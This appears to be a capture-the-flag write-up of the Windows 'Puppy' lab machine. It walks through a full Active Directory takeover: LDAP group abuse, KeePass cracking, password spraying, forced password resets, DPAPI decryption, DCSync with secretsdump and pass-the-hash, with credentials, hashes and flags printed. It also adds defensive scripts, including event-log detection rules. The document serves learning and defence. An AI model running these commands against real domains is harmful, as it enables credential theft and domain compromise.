๐Ÿถ Puppy

January 19, 2025
Windows
6 hours
Medium
Active Directory BloodHound KeePass DPAPI DCSync GenericWrite WinRM
Enumeration

๐Ÿ” 1. Initial Enumeration โ€“ Nmap

I started with a full TCP service and OS scan using Nmap:

nmap -A -Pn -p- puppy.htb

Key ports identified:

  • Kerberos (88), LDAP (389/3268) and SMB (445): the host is a Windows Active Directory domain controller
  • WinRM (5985, Microsoft HTTPAPI): later used for remote shell access
  • RPC portmapper (111) and NFS (2049)

Nmap also reported the domain name PUPPY.HTB, and the OS fingerprint suggests Windows Server 2022.


๐Ÿ“ 2. SMB Share Enumeration with Valid Credentials

Starting credentials provided for the box:

levi.james : KingofAkron2025!

I enumerated SMB shares with:

crackmapexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --shares

🔒 The DEV share showed up in the listing, but access to it was denied.


👥 3. Domain User Enumeration

To identify other users in the environment, I ran:

crackmapexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --users
[Screenshot: domain user enumeration results showing multiple valid users]

This revealed several valid domain users, including:

  • adam.silver
  • steph.cooper
  • ant.edwards
  • jamie.williams
  • steph.cooper_adm

I saved these usernames into a users.txt file for later spraying.


🧠 4. Active Directory Enumeration with BloodHound

To analyze Active Directory permissions and relationships, I collected BloodHound data with bloodhound-python:

bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -op bloodhound_results -ns 10.10.11.70
[Screenshot: BloodHound data collection process]

bloodhound-python writes one JSON file per object type, named with the -op prefix. To make import into the BloodHound GUI easier, I zipped them:

zip bloodhound.zip bloodhound_results_*.json

🔎 5. BloodHound Analysis: Graph Relationships

[Screenshot: BloodHound graph showing privilege relationships and attack paths]

After importing the zipped JSON into BloodHound, I looked at the outbound object control of levi.james@puppy.htb.

Key findings from the visual graph:

  • Membership: levi.james is a direct member of several groups, including HR@PUPPY.HTB
  • Privilege escalation opportunity: HR@PUPPY.HTB has GenericWrite over the DEVELOPERS@PUPPY.HTB group
  • GenericWrite on a group includes write access to its member attribute, so any member of HR, levi.james included, can add accounts to DEVELOPERS

🧬 6. Group Membership Abuse via LDAP: Adding levi.james to DEVELOPERS

Through HR, levi.james effectively holds GenericWrite on the DEVELOPERS group.

To exploit this, I crafted an LDIF file to add levi.james to the group:

modify.ldif:

dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

Then ran:

ldapmodify -x -H ldap://10.10.11.70 -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f modify.ldif
[Screenshot: successful LDAP modification adding user to DEVELOPERS group]

This added levi.james to the DEVELOPERS group. Note that -x is a simple bind over plain LDAP, so the password crosses the wire in clear text; where the DC supports it, ldaps:// or -ZZ (StartTLS) avoids that.

LFG, now we have read access to the DEV share!

[Screenshot: confirmation of access to DEV share after group modification]

Let's see what's inside the DEV share:

smbclient -U 'puppy.htb/levi.james%KingofAkron2025!' //10.10.11.70/DEV
[Screenshot: contents of DEV share showing recovery.kdbx file]

Some suspicious-looking files. Let's download them and hope they aren't viruses.

[Screenshot: downloading files from DEV share]

recovery.kdbx is a KeePass database. It is encrypted with a master password and, given the name, probably holds stored credentials.

KeePass Database Exploitation

๐Ÿ” 7. Cracking recovery.kdbx โ€” KeePass Database

The database is in the KDBX 4 format (internal version 0x00040000), which the keepass2john shipped with John rejected:

keepass2john recovery.kdbx > recovery.hash
# Output: File version '40000' is currently not supported!

So I used keepass4brute instead: a shell script that drives keepassxc-cli and tries each wordlist entry against the database, so it works on KDBX 4.

✅ Steps to crack:

wget https://github.com/r3nt0n/keepass4brute/raw/master/keepass4brute.sh
chmod +x keepass4brute.sh
sudo apt update && sudo apt install keepassxc   # keepass4brute needs keepassxc-cli
./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

After trying thousands of candidates it found the master password. Each attempt runs the database's full key derivation inside keepassxc-cli, so this is far slower than hashcat against a KDBX 3 hash; a small, targeted wordlist matters here.

[Screenshot: KeePass password cracking showing successful password discovery]
Password found: liverpool
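Why keepass2john gives up at '40000', as an added example (not code from the writeup, KeePass or KeePassXC): the following Python parses a KDBX outer header, tells KDBX 3.1 from KDBX 4.x (where field lengths grew to 32 bits and the KDF settings moved into a VariantDictionary), and reports the KDF and its cost parameters. The two sample headers are constructed in memory; the KDF and cipher UUIDs are the ones published in the KeePass/KeePassXC sources. Reading the first few kilobytes of a real .kdbx into parse_kdbx_header tells you before cracking whether you face AES-KDF rounds or Argon2 memory-hard hashing, which is what makes keepass4brute's one-keepassxc-cli-call-per-guess loop slow.

```python
"""Inspect a KDBX outer header: format version and key-derivation settings.
Added example (not code from the writeup, KeePass or KeePassXC), following the
documented KDBX 3.1/4.x outer-header layout. Both sample headers are constructed
in memory; neither is recovery.kdbx."""
import struct
import uuid

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67                       # KDBX file signatures
FIELD_END, FIELD_TRANSFORM_ROUNDS, FIELD_KDF_PARAMETERS = 0, 6, 11
KDF_NAMES = {                                             # KDF UUIDs from the KeePass/KeePassXC sources
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
}
VARIANT_INTS = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}

def parse_variant_dict(buf):
    """Decode the KDBX 4 VariantDictionary that carries the KDF parameters."""
    if struct.unpack_from("<H", buf, 0)[0] != 0x0100:
        raise ValueError("unsupported VariantDictionary version")
    pos, out = 2, {}
    while buf[pos] != 0:                                  # a 0x00 type byte ends the dictionary
        vtype, (nlen,) = buf[pos], struct.unpack_from("<i", buf, pos + 1)
        name = buf[pos + 5:pos + 5 + nlen].decode()
        (vlen,) = struct.unpack_from("<i", buf, pos + 5 + nlen)
        raw = buf[pos + 9 + nlen:pos + 9 + nlen + vlen]
        pos += 9 + nlen + vlen
        if vtype in VARIANT_INTS:
            out[name] = struct.unpack(VARIANT_INTS[vtype], raw)[0]
        elif vtype == 0x08:
            out[name] = raw != b"\x00"
        elif vtype == 0x18:
            out[name] = raw.decode()
        elif vtype == 0x42:
            out[name] = bytes(raw)
        else:
            raise ValueError(f"unknown variant type {vtype:#x}")
    return out

def parse_kdbx_header(data):
    """Return version, header length and KDF settings of a KDBX byte string."""
    sig1, sig2, ver = struct.unpack_from("<III", data, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    major, minor = ver >> 16, ver & 0xFFFF
    size_fmt = "<I" if major >= 4 else "<H"               # KDBX 4 widened field lengths to 32 bits
    pos, fields = 12, {}
    while True:
        fid, (flen,) = data[pos], struct.unpack_from(size_fmt, data, pos + 1)
        pos += 1 + struct.calcsize(size_fmt)
        fields[fid] = data[pos:pos + flen]
        pos += flen
        if fid == FIELD_END:
            break
    info = {"version": (major, minor), "version_hex": f"{ver:x}", "header_len": pos}
    if major >= 4:
        params = parse_variant_dict(fields[FIELD_KDF_PARAMETERS])
        info["kdf"] = KDF_NAMES.get(uuid.UUID(bytes=params["$UUID"]), "unknown")
        info["kdf_params"] = {k: v for k, v in params.items() if k != "$UUID"}
    else:                                                 # KDBX 3.x: always AES-KDF, rounds in field 6
        info["kdf"] = "AES-KDF"
        info["kdf_params"] = {"R": struct.unpack("<Q", fields[FIELD_TRANSFORM_ROUNDS])[0]}
    return info

def build_sample_kdbx4_header():
    """Constructed KDBX 4.0 header with Argon2d (sample data, not recovery.kdbx)."""
    def entry(vtype, name, raw):
        return bytes([vtype]) + struct.pack("<i", len(name)) + name.encode() + struct.pack("<i", len(raw)) + raw
    def field(fid, raw):
        return bytes([fid]) + struct.pack("<I", len(raw)) + raw
    kdf = struct.pack("<H", 0x0100)
    kdf += entry(0x42, "$UUID", uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes)
    kdf += entry(0x42, "S", bytes(32))                    # Argon2 salt (zeros in this sample)
    kdf += entry(0x04, "P", struct.pack("<I", 2))         # parallelism
    kdf += entry(0x05, "M", struct.pack("<Q", 64 << 20))  # memory in bytes
    kdf += entry(0x05, "I", struct.pack("<Q", 2))         # iterations
    kdf += entry(0x04, "V", struct.pack("<I", 0x13))      # Argon2 version 1.3
    kdf += b"\x00"
    hdr = struct.pack("<III", SIG1, SIG2, 0x00040000)     # the '40000' keepass2john complains about
    hdr += field(2, uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff").bytes)  # CipherID: AES-256-CBC
    hdr += field(3, struct.pack("<I", 1))                 # compression: gzip
    hdr += field(4, bytes(32)) + field(7, bytes(16))      # master seed and IV (zeros here)
    return hdr + field(FIELD_KDF_PARAMETERS, kdf) + field(FIELD_END, b"\r\n\r\n")

def build_sample_kdbx31_header():
    """Constructed KDBX 3.1 header: 16-bit field lengths, AES-KDF rounds in field 6."""
    def field(fid, raw):
        return bytes([fid]) + struct.pack("<H", len(raw)) + raw
    hdr = struct.pack("<III", SIG1, SIG2, 0x00030001)
    return hdr + field(FIELD_TRANSFORM_ROUNDS, struct.pack("<Q", 60000)) + field(FIELD_END, b"\r\n\r\n")

if __name__ == "__main__":
    for sample in (build_sample_kdbx31_header(), build_sample_kdbx4_header()):
        print(parse_kdbx_header(sample))
```

For the KDBX 4.0 sample, version_hex is exactly the '40000' from the keepass2john error (0x00040000: major 4, minor 0), and the reported KDF is Argon2d with 64 MiB of memory per guess, which is the cost a cracker must pay for every candidate password.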

🧩 8. Opening the Database in KeePassXC

I used the KeePassXC GUI, which gives a convenient view of the stored entries.

[Screenshot: KeePassXC GUI showing the database unlock dialog]

Steps:

  1. I launched KeePassXC on my Kali machine: keepassxc
  2. Opened the file: recovery.kdbx
  3. When prompted, I entered the cracked master password: liverpool
  4. Once unlocked, I browsed the stored entries. The database contained several credentials, including usernames and passwords for domain accounts.

🔑 9. Extracted Credentials and Password Spray

From the KeePassXC GUI I copied out the following passwords:

  • JamieLove2025!
  • Antman2025!
  • Steve2025!
  • ILY2025!
  • HJKL2025!

I saved these into a text file (password_spray.txt) and sprayed them across the known domain users. --continue-on-success keeps going after the first hit, so every valid pair is reported. On a real engagement, check the lockout policy first (crackmapexec smb <target> -u <user> -p <pass> --pass-pol): a threshold of 5 is common, and five passwords per user is enough to lock accounts out.

crackmapexec smb 10.10.11.70 -u users.txt -p password_spray.txt --continue-on-success
[Screenshot: password spray results showing valid credential discovery]
Valid credential found: ant.edwards:Antman2025!
Privilege Escalation via ACL Abuse

🔎 10. BloodHound Analysis: Escalation via adam.silver

To uncover further privilege relationships and escalation paths, I ran BloodHound as the newly discovered user:

bloodhound-python -u 'ant.edwards' -p 'Antman2025!' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -op bloodhound_ant

Then zipped the results for GUI import:

zip bloodhound_ant.zip bloodhound_ant_*.json
[Screenshot: BloodHound graph showing escalation path through adam.silver]

The graph revealed a clear and exploitable escalation path:

  • ANT.EDWARDS@PUPPY.HTB is a member of the SENIOR DEVS@PUPPY.HTB group
  • This group has GenericAll over ADAM.SILVER@PUPPY.HTB, which is full control of the object, including the right to reset the account's password
  • Furthermore, adam.silver has CanPSRemote on DC.PUPPY.HTB, the Domain Controller
  • Together this gives a direct escalation chain:
ant.edwards → GenericAll → adam.silver → CanPSRemote → DC.PUPPY.HTB

🎯 Game Plan

To exploit this path, I planned the following steps:

  1. Use bloodyAD to reset the password for adam.silver
  2. Ensure the account is enabled
  3. Log in as adam.silver via WinRM
  4. Use the access to run commands on the DC
✅ This is a textbook privilege escalation through ACL abuse followed by PSRemoting.
Shell as adam.silver

🔧 11. ACL Abuse: Resetting adam.silver's Password

Using bloodyAD, I reset the password for adam.silver:

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' set password adam.silver 'P@ssword123'
[Screenshot: successful password reset for adam.silver using bloodyAD]

✅ The password was changed. A forced reset is the noisiest way to use GenericAll: it locks the real user out and leaves a 4724 event on the DC, so on a real engagement record what you changed so it can be reverted.


🛑 12. Fixing STATUS_ACCOUNT_DISABLED

I attempted to login, but the account was disabled:

crackmapexec smb 10.10.11.70 -u 'adam.silver' -p 'P@ssword123' -d PUPPY.HTB
# Output: STATUS_ACCOUNT_DISABLED
[Screenshot: account disabled error when attempting to authenticate]

The ACCOUNTDISABLE bit was set in the account's userAccountControl attribute. GenericAll also covers writing that attribute, so I cleared the flag with bloodyAD:

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE

✅ 13. Confirming Access with WinRM

After re-enabling the account, I confirmed that the credentials work and that WinRM access is allowed:

crackmapexec winrm 10.10.11.70 -u 'adam.silver' -p 'P@ssword123' -d PUPPY.HTB
# Output: Pwn3d!
[Screenshot: successful WinRM authentication after account re-enabling]

Then spawned a remote shell:

evil-winrm -i 10.10.11.70 -u 'adam.silver' -p 'P@ssword123'
[Screenshot: Evil-WinRM shell access as adam.silver]

🧾 14. Reading the user.txt Flag

Once inside, I navigated to the desktop and grabbed the flag:

cd C:\Users\adam.silver\Desktop
type user.txt
[Screenshot: user.txt flag captured]
User flag: 6e7425c383bf22a83e6cc6ce118f47de
Shell as steph.cooper + admin

📈 15. Further BloodHound Enumeration as adam.silver

To check for possible privilege escalation to Domain Admin, I ran BloodHound as adam.silver:

bloodhound-python -u 'adam.silver' -p 'P@ssword123' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -op bloodhound_adam

Zipped the results:

zip bloodhound_adam.zip bloodhound_adam_*.json

I imported the results into the BloodHound GUI and searched for the shortest path to Domain Admins.

[Screenshot: BloodHound analysis showing path to Domain Admin privileges]

After analyzing the graph, I observed:

  • adam.silver has CanPSRemote on DC.PUPPY.HTB, confirming remote PowerShell (WinRM) access to the Domain Controller
  • steph.cooper is a member of ACCOUNT OPERATORS
  • steph.cooper_adm is a member of the ADMINISTRATORS group
  • Most importantly, steph.cooper_adm holds GetChanges and GetChangesAll (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights) on the domain object; together these are exactly the permissions a DCSync attack needs
  • Therefore, escalating to steph.cooper_adm is the final step toward dumping domain credentials

This sets the stage for domain takeover using secretsdump.py after retrieving the credentials for steph.cooper_adm.
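The three BloodHound passes so far (sections 5, 10 and 15) all answer the same question: from a principal I control, which control edges reach a target, and through which group memberships? As an added example, not part of the writeup and not BloodHound's own code, here is that search over a constructed edge list that reuses BloodHound's edge names and mirrors the findings of those sections (it is not collector output, and no layout of the real JSON files is assumed):

```python
"""Shortest control path over a BloodHound-style edge list, offline.
Added example: not from the writeup and not BloodHound's own code. EDGES is a
constructed (source, edge, target) list that uses BloodHound's edge names and
mirrors the findings of sections 5, 10 and 15; it is not collector output."""
from collections import deque

# Edges that let the source act as, or take control of, the target
CONTROL_EDGES = {"MemberOf", "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                 "ForceChangePassword", "AddMember", "AllExtendedRights", "AdminTo", "CanPSRemote"}
DCSYNC_RIGHTS = {"GetChanges", "GetChangesAll"}   # both are needed for DCSync

EDGES = [  # constructed
    ("LEVI.JAMES@PUPPY.HTB", "MemberOf", "HR@PUPPY.HTB"),
    ("HR@PUPPY.HTB", "GenericWrite", "DEVELOPERS@PUPPY.HTB"),
    ("ANT.EDWARDS@PUPPY.HTB", "MemberOf", "SENIOR DEVS@PUPPY.HTB"),
    ("SENIOR DEVS@PUPPY.HTB", "GenericAll", "ADAM.SILVER@PUPPY.HTB"),
    ("ADAM.SILVER@PUPPY.HTB", "CanPSRemote", "DC.PUPPY.HTB"),
    ("STEPH.COOPER_ADM@PUPPY.HTB", "MemberOf", "ADMINISTRATORS@PUPPY.HTB"),
    ("ADMINISTRATORS@PUPPY.HTB", "AdminTo", "DC.PUPPY.HTB"),
    ("STEPH.COOPER_ADM@PUPPY.HTB", "GetChanges", "PUPPY.HTB"),
    ("STEPH.COOPER_ADM@PUPPY.HTB", "GetChangesAll", "PUPPY.HTB"),
]

def adjacency(edges):
    """Map each source node to its outgoing (edge, target) pairs."""
    adj = {}
    for src, edge, dst in edges:
        adj.setdefault(src, []).append((edge, dst))
    return adj

def shortest_path(start, goal, edges, allowed=CONTROL_EDGES):
    """BFS from start to goal over allowed edge types; returns [(src, edge, dst), ...] or None."""
    adj, parent, queue = adjacency(edges), {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while parent[node]:                    # walk the parent links back to start
                src, edge = parent[node]
                path.append((src, edge, node))
                node = src
            return path[::-1]
        for edge, dst in adj.get(node, []):
            if edge in allowed and dst not in parent:
                parent[dst] = (node, edge)
                queue.append(dst)
    return None

def effective_principals(principal, edges):
    """The principal plus every group it belongs to, transitively (MemberOf closure)."""
    adj, seen, stack = adjacency(edges), {principal}, [principal]
    while stack:
        for edge, dst in adj.get(stack.pop(), []):
            if edge == "MemberOf" and dst not in seen:
                seen.add(dst)
                stack.append(dst)
    return seen

def rights_on(principal, target, edges):
    """Every non-membership right the principal holds on target, directly or via groups."""
    holders = effective_principals(principal, edges)
    return {edge for src, edge, dst in edges if src in holders and dst == target and edge != "MemberOf"}

def can_dcsync(principal, domain, edges):
    """True only if the principal (via any nesting) holds both replication rights on the domain."""
    return DCSYNC_RIGHTS <= rights_on(principal, domain, edges)

def fmt(path):
    """Render a path as 'A -[Edge]-> B -[Edge]-> C'."""
    if not path:
        return "no path"
    return path[0][0] + "".join(f" -[{edge}]-> {dst}" for _, edge, dst in path)

if __name__ == "__main__":
    print(fmt(shortest_path("LEVI.JAMES@PUPPY.HTB", "DEVELOPERS@PUPPY.HTB", EDGES)))
    print(fmt(shortest_path("ANT.EDWARDS@PUPPY.HTB", "DC.PUPPY.HTB", EDGES)))
    print(fmt(shortest_path("LEVI.JAMES@PUPPY.HTB", "DC.PUPPY.HTB", EDGES)))   # credential hop is not an AD edge
    print(can_dcsync("STEPH.COOPER_ADM@PUPPY.HTB", "PUPPY.HTB", EDGES))
```

The third query returns no path on purpose: the hop from levi.james to ant.edwards went through a password sitting in the DEV share, which is not an AD edge and never appears in the graph. rights_on includes rights inherited through nested groups, and can_dcsync insists on both replication rights, which is the same check a defender should run over every non-DC principal in the domain.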

🛠 16. Finding steph.cooper's Credentials in a Backup Archive

While looking around the file system as adam.silver, I found a backup archive in C:\Backups:

*Evil-WinRM* PS C:\Backups> dir

    Directory: C:\Backups

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

After downloading and extracting it locally, I found an interesting file:

nms-auth-config.xml.bak

Inside the file:

<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
New credential discovered: steph.cooper : ChefSteph2025!

🔓 17. Extracting DPAPI Secrets from steph.cooper

I connected with Evil-WinRM as steph.cooper and went looking for the user's DPAPI-protected secrets. Both directories below are hidden, so list them with Get-ChildItem -Force.

  1. Identified the user's DPAPI master key file (a GUID-named file under the user's SID):
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-...\
    └── 556a2412-1275-4ccf-b721-e6a0b4f90407
  2. Found a DPAPI credential blob:
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
    └── C8D69EBE9A43E9DEBF6B5FBD48B521B9
  3. Transferred both files to my machine over an Impacket SMB server and decrypted them with Impacket's dpapi.py. The master key is encrypted with a key derived from the user's password and SID, which is why the clear-text password from the backup is enough to unlock it; the credential blob is then decrypted with the recovered master key:
# Decrypt the master key (prints it as 0x... hex)
python3 dpapi.py masterkey -file 556a2412-... -password 'ChefSteph2025!' -sid S-1-5-21-...

# Decrypt the credential blob with the master key recovered above
python3 dpapi.py credential -file C8D69EBE9... -key <decrypted_master_key>
Recovered credential: steph.cooper_adm : FivethChipOnItsWay2025!

🔓 18. DCSync Attack: Domain Takeover

After confirming the steph.cooper_adm credentials, I ran BloodHound again:

bloodhound-python -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -op bloodhound_admin

The graph confirmed it: ✅ steph.cooper_adm has DCSync rights.

With secretsdump.py I executed the DCSync attack (add -just-dc-ntlm if you only want the NTLM hashes rather than Kerberos keys and clear-text entries as well):

secretsdump.py 'PUPPY.HTB/steph.cooper_adm:FivethChipOnItsWay2025!'@10.10.11.70

Successfully dumped domain hashes, including the Administrator NTLM hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::

⚡ 19. Final Pwn: Administrator Shell via WinRM

Logged in with the NT hash:

evil-winrm -i 10.10.11.70 -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'

Boom, admin shell acquired.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Root Flag: f6fdf655fc4fb36629866d164f987b73

๐Ÿ Rooted puppy.htb

🎯 Attack Chain Summary

This box demonstrated a complete Active Directory takeover through multiple privilege escalation vectors:

levi.james (HR group)
    → GenericWrite on DEVELOPERS
    → access to the DEV share
    → KeePass database cracked
    → ant.edwards credentials
    → GenericAll on adam.silver
    → WinRM access to the DC
    → steph.cooper credentials (backup archive)
    → DPAPI extraction
    → steph.cooper_adm credentials
    → DCSync rights
    → Administrator hash
    → Domain Admin

Key Techniques Demonstrated

  • Active Directory Enumeration: Using BloodHound for privilege escalation path discovery
  • Group Membership Manipulation: Exploiting GenericWrite permissions via LDAP
  • KeePass Database Exploitation: Cracking v4 databases and extracting credentials
  • ACL Abuse: Leveraging GenericAll permissions for password resets
  • DPAPI Credential Extraction: Decrypting stored credentials from user profiles
  • DCSync Attack: Domain takeover through replication rights abuse

Tools Used

  • Nmap: Network reconnaissance and service enumeration
  • CrackMapExec: SMB enumeration and credential validation
  • BloodHound: Active Directory relationship analysis
  • keepass4brute: KeePass v4 database cracking
  • bloodyAD: Active Directory manipulation and ACL abuse
  • dpapi.py: DPAPI credential extraction
  • secretsdump.py: DCSync attack execution
  • Evil-WinRM: Remote PowerShell access
Defensive Recommendations

Regular ACL audits (BloodHound is as useful to defenders as to attackers), least privilege on group and user objects, keeping credentials out of shares and backups, and alerting on group-membership changes, password resets and replication requests from non-DC accounts would each have broken this chain at a different point.
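The alerting point above becomes concrete when written as detection logic. As an added example (not from the writeup), the following Python runs a few rules over Security-log events serialized as JSON lines: group membership additions (4728/4732/4756, flagging a user who adds themselves), password resets (4724), account enablement (4722), and directory replication requests (4662 on the domainDNS object carrying the DS-Replication-Get-Changes* GUIDs) from anything that is not a DC computer account. The event records and the DC_ACCOUNTS allow-list are constructed test data, not real DC logs.

```python
"""Flag the AD changes this attack chain produces, from Security-log JSON lines.
Added example, not from the writeup. SAMPLE_EVENTS is constructed test data using
the EventData field names of the Windows Security log; it is not a real DC log."""
import json

REPLICATION_GUIDS = {   # control-access rights that DCSync needs (schema GUIDs)
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"   # schema GUID of the domainDNS class
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}
DC_ACCOUNTS = {"DC$"}   # assumption: the domain's DC computer accounts, which replicate legitimately

SAMPLE_EVENTS = [  # constructed, in the order the writeup's actions would produce them
    {"EventID": 4728, "SubjectUserName": "levi.james", "SubjectUserSid": "S-1-5-21-1-2-3-1105",
     "MemberName": "CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB", "MemberSid": "S-1-5-21-1-2-3-1105",
     "TargetUserName": "DEVELOPERS"},
    {"EventID": 4724, "SubjectUserName": "ant.edwards", "TargetUserName": "adam.silver"},
    {"EventID": 4722, "SubjectUserName": "ant.edwards", "TargetUserName": "adam.silver"},
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
     "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "steph.cooper_adm", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
     "AccessMask": "0x100"},
    {"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "adam.silver"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

def guids_in(text):
    """Extract the {guid} tokens of a 4662 Properties or ObjectType string, lower-cased."""
    return {tok.strip("%{}").lower() for tok in text.split() if "{" in tok}

def check_event(ev):
    """Return a finding dict if the event matches one of the chain's steps, else None."""
    eid, actor = ev.get("EventID"), ev.get("SubjectUserName", "")
    if eid in GROUP_ADD_EVENTS:
        return {"rule": "group-membership-add", "actor": actor,
                "detail": f"{ev.get('MemberName', '')} added to {ev.get('TargetUserName', '')} ({GROUP_ADD_EVENTS[eid]} group)",
                "self_add": ev.get("MemberSid") == ev.get("SubjectUserSid")}  # user adding themselves via a delegated ACL
    if eid == 4724:
        return {"rule": "password-reset", "actor": actor, "detail": ev.get("TargetUserName", "")}
    if eid == 4722:
        return {"rule": "account-enabled", "actor": actor, "detail": ev.get("TargetUserName", "")}
    if eid == 4662 and DOMAIN_DNS_CLASS in guids_in(ev.get("ObjectType", "")):
        hit = guids_in(ev.get("Properties", "")) & set(REPLICATION_GUIDS)
        if hit and actor not in DC_ACCOUNTS:      # DCs replicate all day; user accounts never should
            return {"rule": "dcsync", "actor": actor,
                    "detail": ", ".join(sorted(REPLICATION_GUIDS[g] for g in hit))}
    return None

def analyse(jsonl):
    """Run check_event over JSON lines; returns the findings in log order."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = check_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_JSONL):
        print(finding)
```

Every step of the chain leaves one of these events on the DC, and the dcsync rule fires on steph.cooper_adm's secretsdump run even though that account legitimately holds the replication rights; the DC_ACCOUNTS allow-list is the only thing keeping normal replication traffic quiet, so keep it accurate and keyed on SIDs rather than names in production.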